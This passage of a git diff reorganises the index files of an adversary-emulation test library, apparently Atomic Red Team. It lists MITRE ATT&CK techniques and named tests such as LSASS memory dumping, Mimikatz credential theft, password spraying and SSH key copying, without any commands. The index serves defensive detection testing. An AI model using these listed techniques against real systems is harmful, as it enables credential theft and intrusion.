+- T1583.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.002 Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
+# reconnaissance
+- T1595 Active Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.002 Business Relationships [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.004 CDNs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.004 Client Configurations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589.001 Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.002 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.001 DNS/Passive DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.001 Determine Physical Locations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.001 Domain Properties [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589.003 Employee Names [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.003 Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592 Gather Victim Host Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590 Gather Victim Network Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591 Gather Victim Org Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.001 Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.005 IP Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.003 Identify Business Tempo [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.006 Network Security Appliances [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.004 Network Topology [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.003 Network Trust Dependencies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598 Phishing for Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1597.002 Purchase Technical Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.005 Scan Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1597 Search Closed Sources [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1593.002 Search Engines [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1594 Search Victim-Owned Websites [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1593.001 Social Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.002 Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598.002 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598.003 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598.001 Spearphishing Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1597.001 Threat Intel Vendors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.002 WHOIS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
# lateral-movement
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -434,40 +572,6 @@
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-# collection
-- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
-- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1115 Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
-- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1113 Screen Capture](../../T1113/T1113.md)
- - Atomic Test #3: X Windows Capture [linux]
- - Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
-- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-
# execution
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
@@ -482,11 +586,13 @@
- T1204.002 Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
@@ -514,6 +620,7 @@
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index 052b2df9..3adf5fa8 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -113,6 +113,76 @@
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+# credential-access
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
+ - Atomic Test #1: Search Through Bash History [linux, macos]
+- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
+ - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
+ - Atomic Test #2: Extract passwords with grep [macos, linux]
+- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
+ - Atomic Test #2: Search macOS Safari Cookies [macos]
+- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
+ - Atomic Test #1: AppleScript - Prompt User for Password [macos]
+- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1555.001 Keychain](../../T1555.001/T1555.001.md)
+ - Atomic Test #1: Keychain [macos]
+- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1040 Network Sniffing](../../T1040/T1040.md)
+ - Atomic Test #2: Packet Capture macOS [macos]
+- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
+ - Atomic Test #2: Discover Private SSH Keys [macos, linux]
+ - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
+- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
+# collection
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
+ - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
+ - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
+ - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
+ - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
+- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1115 Clipboard Data](../../T1115/T1115.md)
+ - Atomic Test #3: Execute commands from clipboard [macos]
+- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
+ - Atomic Test #1: AppleScript - Prompt User for Password [macos]
+- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
+ - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
+- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1113 Screen Capture](../../T1113/T1113.md)
+ - Atomic Test #1: Screencapture [macos]
+ - Atomic Test #2: Screencapture (silent) [macos]
+- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
@@ -150,9 +220,6 @@
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.001 Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
-- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- - Atomic Test #1: Disable history collection [linux, macos]
- - Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
@@ -166,6 +233,9 @@
- T1564.003 Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
+ - Atomic Test #1: Disable history collection [linux, macos]
+ - Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -224,6 +294,7 @@
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -252,6 +323,7 @@
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1489 Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
@@ -397,38 +469,6 @@
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-# collection
-- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
-- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1115 Clipboard Data](../../T1115/T1115.md)
- - Atomic Test #3: Execute commands from clipboard [macos]
-- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- - Atomic Test #1: AppleScript - Prompt User for Password [macos]
-- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
-- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1113 Screen Capture](../../T1113/T1113.md)
- - Atomic Test #1: Screencapture [macos]
- - Atomic Test #2: Screencapture (silent) [macos]
-- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-
# exfiltration
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
@@ -450,42 +490,6 @@
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-# credential-access
-- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- - Atomic Test #1: Search Through Bash History [linux, macos]
-- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- - Atomic Test #2: Extract passwords with grep [macos, linux]
-- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- - Atomic Test #2: Search macOS Safari Cookies [macos]
-- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- - Atomic Test #1: AppleScript - Prompt User for Password [macos]
-- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1555.001 Keychain](../../T1555.001/T1555.001.md)
- - Atomic Test #1: Keychain [macos]
-- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1040 Network Sniffing](../../T1040/T1040.md)
- - Atomic Test #2: Packet Capture macOS [macos]
-- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- - Atomic Test #2: Discover Private SSH Keys [macos, linux]
- - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
-- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-
# initial-access
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 526d1b20..576b8e04 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1,4 +1,140 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
+# credential-access
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
+ - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
+- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
+ - Atomic Test #3: Extracting passwords with findstr [windows]
+ - Atomic Test #4: Access unattend.xml [windows]
+- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
+ - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
+- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
+ - Atomic Test #1: Run Chrome-password Collector [windows]
+ - Atomic Test #3: LaZagne - Credentials from Browser [windows]
+- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
+ - Atomic Test #1: Enumeration for Credentials in Registry [windows]
+ - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
+- T1003.006 DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
+ - Atomic Test #2: PowerShell - Prompt User for Password [windows]
+- T1558.001 Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
+ - Atomic Test #1: GPP Passwords (findstr) [windows]
+ - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
+- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
+ - Atomic Test #1: Request for service tickets [windows]
+- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
+ - Atomic Test #1: Input Capture [windows]
+- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
+ - Atomic Test #1: Dumping LSA Secrets [windows]
+- [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
+ - Atomic Test #1: Windows Credential Editor [windows]
+ - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows]
+ - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows]
+ - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
+ - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
+ - Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
+ - Atomic Test #7: LSASS read with pypykatz [windows]
+- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
+ - Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
+ - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
+ - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
+ - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
+ - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
+ - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
+- [T1040 Network Sniffing](../../T1040/T1040.md)
+ - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
+ - Atomic Test #4: Windows Internal Packet Capture [windows]
+- [T1003 OS Credential Dumping](../../T1003/T1003.md)
+ - Atomic Test #1: Powershell Mimikatz [windows]
+ - Atomic Test #2: Gsecdump [windows]
+ - Atomic Test #3: Credential Dumping with NPPSpy [windows]
+- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
+ - Atomic Test #1: Password Cracking with Hashcat [windows]
+- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
+ - Atomic Test #1: Install and Register Password Filter DLL [windows]
+- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
+ - Atomic Test #1: Brute Force Credentials [windows]
+- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
+ - Atomic Test #1: Password Spray all Domain Users [windows]
+ - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
+- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
+ - Atomic Test #1: Private Keys [windows]
+- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
+ - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
+ - Atomic Test #2: Registry parse with pypykatz [windows]
+ - Atomic Test #3: esentutl.exe SAM copy [windows]
+ - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
+- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
+# collection
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
